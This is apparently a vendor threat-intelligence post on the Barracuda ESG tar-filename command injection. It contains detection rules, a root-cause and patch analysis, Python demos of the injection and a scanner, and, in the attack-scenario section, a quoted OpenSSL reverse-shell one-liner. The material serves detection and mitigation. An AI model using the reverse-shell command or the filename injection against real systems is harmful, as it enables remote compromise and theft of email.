
CVE-2023-2868: Barracuda Email Security Gateway Vulnerability

2023.08.16Cyber Threat Intelligence
The following blog post is based on our June H1 Vulnerability Insights Report. TeamT5 Vulnerability Research Team is dedicated to providing timely mitigation and response guidelines to critical vulnerabilities. Contact us for more information about our vulnerability intelligence.


CVE-2023-2868 is a command injection vulnerability in Barracuda Email Security Gateway (ESG).[1] The Barracuda ESG serves as both an email management platform and a gateway that filters potentially malicious emails. Threat actors can exploit CVE-2023-2868 to compromise a vulnerable ESG and retrieve the email records and content of the targets behind it. In this blog post, we provide a comprehensive analysis of CVE-2023-2868 together with mitigation guidelines.

Executive Summary

We assess the severity of CVE-2023-2868 as critical and urge our customers to use this report to mitigate its effects. First, our technical analysis shows that threat actors can inject a reverse-shell command into Barracuda ESG simply by sending an email with a crafted TAR attachment. Second, a broad range of Barracuda ESG versions is affected, from the version released in 2014 to date. Last, public research suggests that more than fifty thousand Barracuda ESG devices are exposed to the vulnerability.
Barracuda has confirmed the attacks and released IOCs for exploitation of CVE-2023-2868 against the ESG. Further research shows that the attacks were launched by the China-nexus actor UNC4841[2] and can be traced back to at least October 2022. Targets include U.S. government entities, Chinese IT firms, research institutes in Taiwan and Pakistani banks. The threat actors have deployed at least three malware families in the attacks: QuitTunnel (aka SALTWATER), SEASPY and SEASIDE. We summarize this information in the Possible Attack Scenario section.
Based on the IOCs, TeamT5 has prepared a comprehensive Mitigation and Response Advisory for our customers. Even if you have already patched the vulnerability, we strongly recommend using the detection tools provided below to check whether CVE-2023-2868 was exploited before the patch was applied.
The Mitigation and Response Advisory covers:
  • Official Patch Information
  • Detection tools for checking if CVE-2023-2868 is exploited by threat actors:
    • YARA rule detecting if your Barracuda ESG has been exploited with CVE-2023-2868.
    • Barracuda official SNORT rules detecting threat actors’ attack attempt with SEASPY.

Affected Product

Barracuda ESG -

Mitigation and Response Advisory

1. Official Patch Information

Your Barracuda ESG is vulnerable to CVE-2023-2868 if the version is between -

2. Detection tools for checking if CVE-2023-2868 is exploited by threat actors


YARA rule

The threat actors exploit CVE-2023-2868 through crafted TAR attachments. Our customers can deploy the following YARA rule against mail stores and recipients' PCs to find such TAR files. A matching TAR file found in a recipient's mailbox passed through the ESG, which suggests that the appliance has been exploited with CVE-2023-2868. The rule is written against the 512-byte ustar header layout: the "ustar" magic sits at offset 257 of every header, so uint32(257) == 0x61747375 checks that the file starts with a valid header, and @ustar[i] + 255 is the first byte of the 512-byte block that follows each header (257 + 255 = 512). The condition therefore fires when that following block begins with the two bytes '` (0x27 0x60), which is the name field of the next entry whenever the matched entry itself carries no data. To test the name field of every header directly, apply the same two-byte check at @ustar[i] - 257 as well.
rule CVE_2023_2868_TAR_Exploit
{
    meta:
        description = "Detect for TAR archive with single quote/backtick as start of filename of enclosed files. CVE-2023-2868"
        date_created = "2023-05-26"
        date_modified = "2023-06-09"
        sha256 = "f289b565839794fe4f450ed0c9343b8fb699f97544d9af2a60851abc8b4656e0"
        component = "vulnerability"

    strings:
        $ustar = { 75 73 74 61 72 }   // "ustar" magic, at offset 257 of every tar header

    condition:
        // the file begins with a ustar header ("usta" read little-endian at offset 257)
        filesize < 1MB and uint32(257) == 0x61747375 and
        // bytes 0x27 0x60 ("'`") at the start of the block following any ustar header
        for any i in (0 .. #ustar) : (uint16(@ustar[i] + 255) == 0x6027)
}
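The Python script below is an added example (it is not part of the original TeamT5 post and is not the YARA rule above rewritten) that walks the 512-byte ustar headers of an archive and reports every member whose name starts with '`. Unlike the rule's offset arithmetic it inspects each header's own name field, including the ustar prefix field, so it catches the marker in the very first header too. It builds its own sample archives in memory with the standard tarfile module; the member names and contents are constructed for the demonstration.

```python
import io
import tarfile

BLOCK = 512                 # a ustar archive is a sequence of 512-byte blocks
USTAR_MAGIC = b"ustar"      # sits at offset 257 of every header (the YARA rule's uint32(257) check)
INJECTION_PREFIX = b"'`"    # quote + backtick: closes the '$f' quoting in qx{} and opens a command substitution


def _octal_field(field: bytes) -> int:
    """Decode a NUL/space padded octal header field, e.g. the size field at offset 124."""
    digits = field.split(b"\x00", 1)[0].strip()
    return int(digits, 8) if digits else 0


def _member_name(header: bytes) -> bytes:
    """Full member name: the ustar 'prefix' field (345..500) joined to 'name' (0..100)."""
    name = header[0:100].split(b"\x00", 1)[0]
    prefix = header[345:500].split(b"\x00", 1)[0]
    return prefix + b"/" + name if prefix else name


def scan_tar_for_injection(data: bytes):
    """Return [(header_offset, member_name), ...] for members whose name starts with '`.

    The walk stops at the end-of-archive zero block or at the first block that does
    not carry the ustar magic, mirroring the rule's requirement of a valid first header.
    GNU long-name (type L) and pax (type x) entries keep the real name in their data
    block; they are skipped like any other member and are not inspected here.
    """
    hits = []
    offset = 0
    while offset + BLOCK <= len(data):
        header = data[offset:offset + BLOCK]
        if header == b"\x00" * BLOCK:          # end-of-archive marker
            break
        if header[257:262] != USTAR_MAGIC:      # not a ustar header: stop scanning
            break
        name = _member_name(header)
        if name.startswith(INJECTION_PREFIX):
            hits.append((offset, name.decode("utf-8", "replace")))
        size = _octal_field(header[124:136])
        # skip the header block plus the member's data, rounded up to whole blocks
        offset += BLOCK + ((size + BLOCK - 1) // BLOCK) * BLOCK
    return hits


def build_tar(members):
    """Build an in-memory ustar archive from [(name, content_bytes), ...] (constructed sample data)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, content in members:
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed samples: a benign attachment and one carrying an injection-style member name.
BENIGN_TAR = build_tar([("report.txt", b"quarterly numbers\n")])
MALICIOUS_TAR = build_tar([("readme.txt", b"x"), ("'`id`'", b"")])

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_TAR), ("malicious", MALICIOUS_TAR)):
        print(label, scan_tar_for_injection(blob))   # malicious -> [(1024, "'`id`'")]
```

In the malicious sample the first member carries one data block, so the second header, the one with the '` name, begins at offset 1024; that is the offset the scanner reports, and it is where a ustar-aware tool such as the ESG's tar listing would read the name from.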


Barracuda provides four official SNORT rules for detecting the threat actors' SEASPY activity (the "magic packet" that activates the backdoor on ports 25 and 587).
alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY"; flags:S; dsize:>9; content:"oXmp"; offset:0; depth:4; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000000; rev:1;)
The following three rules use the tcp.hdr buffer and require Suricata 5.0.4 or newer:
alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY_1358"; flags:S; tcp.hdr; content:"|05 4e|"; offset:22; depth:2; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000001; rev:1;)

alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY_58928"; flags:S; tcp.hdr; content:"|e6 30|"; offset:28; depth:2; byte_test:4,>,16777216,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000002; rev:1;)

alert tcp any any -> any [25,587] (msg:"M_Backdoor_SEASPY_58930"; flags:S; tcp.hdr; content:"|e6 32|"; offset:28; depth:2; byte_test:4,>,16777216,0,big,relative; byte_test:2,>,0,0,big,relative; threshold:type limit,track by_src,count 1,seconds 3600; sid:1000003; rev:1;)

Possible Attack Scenario

Threat actors have exploited CVE-2023-2868 in Barracuda ESG, as Barracuda confirmed in its mitigation advisory. Further research shows that the attacks were launched by the China-nexus actor UNC4841 and can be traced back to at least October 2022. The threat actors have deployed at least three malware families in the attacks: QuitTunnel (aka SALTWATER), SEASPY and SEASIDE. The targets are worldwide, including government entities in the U.S. and Japan, financial institutions in Pakistan, research institutes in Taiwan and IT firms in China. Notably, one of the Chinese IT firms is an email service provider with clients in Taiwan's IT and financial sectors. We have summarized the IOCs in Appendix III: Indicators of Compromise.
We have found and validated a public exploit for CVE-2023-2868. Based on that information, the TeamT5 Vulnerability Intelligence Team has reconstructed the following attack scenario with high confidence.
First, the threat actors identify potential targets running a Barracuda ESG vulnerable to CVE-2023-2868. Then they send the target an email with a TAR file attached. When the ESG scans the email, it unpacks the TAR attachment. A TAR file is an archive format, not a compressed one: it is a sequence of 512-byte headers and data blocks, and the scanner lists and then extracts each member by name. If a member's filename starts with a single quotation mark followed by a backtick ('`), the name breaks out of the quoting in the extraction command and CVE-2023-2868 is triggered, leading to command injection. The technical detail is described in Appendix IV: Technical Analysis.
Figure: example of a malicious TAR file whose member name starts with '`
Once the injected filename is evaluated, the command embedded in it is base64-decoded and executed; in the observed case it used OpenSSL to establish an encrypted reverse shell: setsid sh -c "mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect >/tmp/p 2>/dev/null;rm /tmp/p"%. The threat actors can then deploy further malware to establish persistence in the target's environment, and can build a proxy with malware such as QuitTunnel to move laterally and infect the internal mail server.
Once the Barracuda ESG is compromised, the threat actors can obtain the history and content of every email that passes through it. Note that Barracuda ESG is a relatively closed system, so most customers will need a professional Compromise Assessment (CA) or Incident Response (IR) team to understand their situation: a compromise assessment identifies ongoing or past malicious activity, while incident response services identify the root cause of the campaign.
Our partners and clients can contact TeamT5 to discuss customized countermeasures. TeamT5 is willing to provide technical support and help with the investigation.

Appendix I: More about CVE-2023-2868

The table below is an excerpt from our new series, the Patch Management Report (PMR). Published every two weeks (or more often), the PMR provides our customers with concise yet comprehensive updates on the most critical and exploitable vulnerabilities selected by the TeamT5 vulnerability research team during the period. Each vulnerability is provided with patch information. If you are interested in subscribing to this new report series, please contact TeamT5 for more information.


CVE: CVE-2023-2868
Vendor: Barracuda
Product: Email Security Gateway
Description: Barracuda Email Security Gateway (ESG) appliance contains an improper input validation vulnerability of a user-supplied .tar file, leading to remote command injection.
  A remote command injection vulnerability exists in the Barracuda Email Security Gateway (appliance form factor only) product affecting versions ... The vulnerability arises out of a failure to comprehensively sanitize the processing of .tar files (tape archives). It stems from incomplete input validation of a user-supplied .tar file as it pertains to the names of the files contained within the archive. As a consequence, a remote attacker can format these file names in a particular manner that results in remotely executing a system command through Perl's qx operator with the privileges of the Email Security Gateway product. This issue was fixed as part of the BNSF-36456 patch, which was automatically applied to all customer appliances.
Patch: Apply updates per vendor instructions.
Reference:
  • NVD JSON: https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2023-2868?addOns=dictionaryCpes
  • Vendor advisory: https://status.barracuda.com/incidents/34kx82j5n4q9
  • Vendor advisory and mitigation: https://www.barracuda.com/company/legal/esg-vulnerability

Appendix II: Malware Table

Name: QuitTunnel
Type: RAT
Description: QuitTunnel, also known as SALTWATER, is an x64 ELF RAT. Its C2 protocol starts with "quit\r\n", which is why TeamT5 calls it QuitTunnel. It was first seen implanted in Barracuda Email Security Gateway and carries proxy functionality (DownloadChannel, UploadChannel, ProxyChannel, ShellChannel and TunnelArgs) used for lateral movement.
Attribution: Unknown
First Seen: 2023.05

Name: SEASPY
Type: RAT
Description: SEASPY is an x64 ELF persistence RAT that poses as a legitimate Barracuda Networks service and establishes itself as a PCAP filter, monitoring traffic on port 25 (SMTP) and port 587. SEASPY contains backdoor functionality that is activated by a "magic packet" such as "oXmp".
Attribution: Unknown
First Seen: 2023.05

Name: SEASIDE
Type: RAT
Description: SEASIDE is a Lua-based module for the Barracuda SMTP daemon (bsmtpd) that monitors SMTP HELO/EHLO commands to receive a command and control (C2) IP address and port, which it passes as arguments to an external binary that establishes a reverse shell.
Attribution: Unknown
First Seen: 2023.05

Appendix III: Indicators of Compromise (IOCs)

Malware samples exploiting CVE-2023-2868

Appendix IV: Technical Analysis

  • Decrypt the root file system
To understand the root cause of CVE-2023-2868, we needed to jailbreak the Barracuda virtual image to obtain its files. However, most of the file system in the image is encrypted with LUKS (Linux Unified Key Setup), and the initial RAM file system (initramfs.img) is encrypted as well. We therefore reversed the kernel image (kernel.img) and found that initramfs.img is AES-decrypted during boot. As a result, we could emulate kernel.img and initramfs.img with QEMU[3] and dump the decrypted root file system from memory with GDB.
After unpacking the root file system, the LUKS keys can be found in the /etc/cryptsetup directory.
  • Root Cause Analysis
After reviewing the Perl scripts, we identified the vulnerable one: amavisd[4], which Barracuda ESG uses for virus and spam detection. amavisd contains a command injection vulnerability in the code that unpacks TAR attachments.
The relevant excerpt is shown below. The do_tar() procedure uses qx() to run /bin/tar and interpolates each member's file path ($f) into the shell command line, so a crafted member name leads to arbitrary command execution with the privileges of the Email Security Gateway product. Moreover, the tag BNSF-19979 in the script (a performance change that switched TAR handling to /bin/tar) suggests that the command injection has existed since the version released in 2014.[5]
    # This is amavisd-new.
    # It is a high-performance interface between message transfer agent (MTA)
    # and virus scanners and/or spam scanners.

    sub decompose_part($$$) {
        my($part,$tempdir,$file_generator_object) = @_;

        my($filename) = "$tempdir/parts/$part";
        my($filetype) = $file_generator_object->file_type_long($part);
        my($ty)       = $file_generator_object->file_type($part);
        my($rfilename)= $file_generator_object->map_rfilename_to_parts($part);
        do_log(4, "decompose_part: $part $filetype $filename $rfilename ($ty)");

        # possible return values from eval:
        # 0 - truly atomic, unknown or archiver failure; consider atomic
        # 1 - some archiver format, successfully unpacked, result replaces original
        # 2 - probably unpacked, but keep the original (eg self-extracting archive)
        my($sts) = eval {
            return 0  if !defined($ty);  # consider atomic if unknown
            local($_) = $ty;
            /^\.gz$/   && return do_gunzip($part,$tempdir);  # fallback
            /^\.tar$/  && return do_tar($part,$tempdir);     # ====> Vulnerable function
            /^\.zip$/  && return do_unzip($part,0,$tempdir);
            /^\.rar$/  && return do_unrar($part,0,$tempdir);
            /^\.lha$/  && return do_lha($part,0,$tempdir);
            /^\.arc$/  && return do_arc($part,$tempdir);
            /^\.arj$/  && return do_unarj($part,$tempdir);
            /^\.zoo$/  && return do_zoo($part,$tempdir);
            /^\.7z$/   && return do_p7zip($part,$tempdir);
            /^\.tnef$/ && return do_tnef($part,$tempdir);
            /^\.exe$/  && return do_executable($part,$tempdir);
            /^\.pdf$/  && $attachment_regex_defined && return do_pdf($part,$tempdir);
            /^\.doc$/  && $attachment_regex_defined && return do_antiword($part,$tempdir);
            /^\.docx$/ && $attachment_regex_defined && return do_docx($part,$tempdir);
            /^\.xlsx$/ && $attachment_regex_defined && return do_xlsx($part,$tempdir);
            /^\.pptx$/ && $attachment_regex_defined && return do_pptx($part,$tempdir);
            # ... remaining handlers omitted from this excerpt
        };
        # ... rest of decompose_part omitted from this excerpt
    }

    # untar any tar archives with '/bin/tar'
    # extract each file individually
    # BNSF-19979 Switched to /bin/tar instead of Archive::Tar
    sub do_tar($$) {
        my($part,$tempdir) = @_;
        my $tarexec = '/bin/tar';

        unless (-x $tarexec) {
            chomp($@); do_log(4, "Tar unavailable! Could not extract $part");
            return 0;
        }

        do_log(4,"Untarring $part");
        # member names are taken verbatim from the archive listing ...
        my @files = split(/\n/,qx{$tarexec -tf $tempdir/parts/$part});
        foreach my $f (@files) {
            next  if ($f =~ /\/$/); #ignore directories
            # ... and interpolated into a shell command line: a name starting with '`
            # closes the single quotes and opens a command substitution (CVE-2023-2868)
            my $content = qx{$tarexec -O -xf $tempdir/parts/$part '$f'}; # ===> $f can be exploited via command injection
            if ($content) {
                my $newpart = getfilename();
                setfilename($newpart, $f);
                # ... rest of do_tar omitted from this excerpt
            }
        }
    }
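To make the root cause and the attack scenario above concrete, here is an added Python example (it is not code from the page, from amavisd or from Barracuda) that reproduces the two invocation styles side by side: a qx-style shell command line that interpolates the member name, and an argv-style call with a "--" separator in the shape of the fixed code. It builds a one-member TAR in a temporary directory whose member name carries a harmless injected command (an echo into a marker file); the archive, member name and marker file are constructed for the demonstration, /bin/sh is assumed to exist, and the argv variant reports None if no tar binary is installed.

```python
import io
import os
import subprocess
import tarfile
import tempfile


def build_archive(path: str, member_name: str, content: bytes = b"payload\n") -> None:
    """Write a one-member ustar archive; in the real attack the member name is attacker-chosen."""
    with tarfile.open(path, "w", format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(content)
        tf.addfile(info, io.BytesIO(content))


def extract_member_vulnerable(archive: str, member: str) -> bytes:
    """Shell-interpolated call, the shape of qx{$tarexec -O -xf $tempdir/parts/$part '$f'}.

    The member name is spliced into a command line that /bin/sh parses, so a name
    beginning with '` closes the single quotes and opens a command substitution that
    runs before tar does.
    """
    command = "tar -O -xf %s '%s'" % (archive, member)
    proc = subprocess.run(["/bin/sh", "-c", command], capture_output=True)
    return proc.stdout


def extract_member_fixed(archive: str, member: str):
    """argv-style call, the shape of run_command(..., $tarexec, qw(-O -xf), $part, "--", $f).

    No shell is involved: the member name is a single argv entry, and "--" keeps a name
    that starts with '-' from being read as an option. Returns None if tar is absent.
    """
    try:
        proc = subprocess.run(["tar", "-O", "-xf", archive, "--", member], capture_output=True)
    except FileNotFoundError:
        return None
    return proc.stdout


def run_demo() -> dict:
    """Drive both variants against the same crafted archive and report what happened."""
    work = tempfile.mkdtemp(prefix="cve-2023-2868-demo-")
    marker = os.path.join(work, "injected.txt")
    archive = os.path.join(work, "attachment.tar")
    # Constructed injection-style name: '` ends the quoted argument, then `...` runs a command.
    member = "'`echo INJECTED > %s`'" % marker
    build_archive(archive, member)

    vulnerable_output = extract_member_vulnerable(archive, member)
    vulnerable_injected = os.path.exists(marker)   # True: the shell ran the embedded command
    if vulnerable_injected:
        os.remove(marker)

    fixed_output = extract_member_fixed(archive, member)
    fixed_injected = os.path.exists(marker)        # False: the name was passed literally

    return {
        "vulnerable_injected": vulnerable_injected,
        "vulnerable_output": vulnerable_output,     # tar never received the real member name
        "fixed_injected": fixed_injected,
        "fixed_output": fixed_output,               # b"payload\n" when a tar binary is installed
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

The marker file appears only after the shell-interpolated variant: the quote and backtick in the name are parsed by sh, the embedded echo runs, and tar is finally handed an empty argument. With the argv form, tar receives the odd-looking name as one literal string and simply extracts the member, which is exactly why the fix passes $f as a separate argument after "--".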
  • Patch Analysis
Barracuda deployed an automated security patch for the command injection at the end of May 2023. The patch diff is shown below: it replaces the dangerous qx() call with run_command(), which executes tar with an argument list, the member name passed as a separate argument after "--", instead of through a shell command line.
--- amavisd.BNSF-36451  2021-04-19 13:56:58.322815675 -0700
+++ amavisd     2023-06-11 22:01:52.321732072 -0700
@@ -5152,7 +5152,15 @@
     my @files = split(/\n/,qx{$tarexec -tf $tempdir/parts/$part});
     foreach my $f (@files) {
         next  if ($f =~ /\/$/); #ignore directories
-        my $content = qx{$tarexec -O -xf $tempdir/parts/$part '$f'};
+        my($proc_fh) = run_command(undef,undef, $tarexec, qw(-O -xf),
+            "$tempdir/parts/$part", "--", "$f");
+        my($output) = '';
+        while( defined($_ = $proc_fh->getline) ) { $output .= $_ }
+        my($err); $proc_fh->close or $err=$!; my($retval) = retcode($?);
+        my $content = undef;
+        if ($output ne '') {
+            $content = $output;
+        }
         if ($content) {
             my $newpart = getfilename();
             setfilename($newpart, $f);
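Review bot: the added line `my($err); $proc_fh->close or $err=$!; my($retval) = retcode($?);` computes $err and $retval but neither is checked or logged, so a tar that fails or is killed is indistinguishable from a member with empty content, and the following `if ($output ne '')` silently treats the failure as "nothing to scan". Suggest acting on $retval/$err, for example `do_log(4, "tar failed on $part: $err") and return 0` as do_tar already does when tar is unavailable, so that an attachment tar cannot unpack is not passed through unscanned. Separately, the listing call kept in the context two lines up, `qx{$tarexec -tf $tempdir/parts/$part}`, still goes through the shell; $tempdir and $part are generated internally rather than attacker-controlled, but converting it to run_command as well would remove the last shell invocation from this path.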


1. Barracuda Networks is a company providing security, networking and storage products based on network appliances and cloud services. https://www.barracuda.com/
3. $ qemu-system-x86_64 -S -s -kernel ./kernel.img -initrd ./initramfs.img -nographic -append "console=ttyS0 decrypt_initrd" -m 1024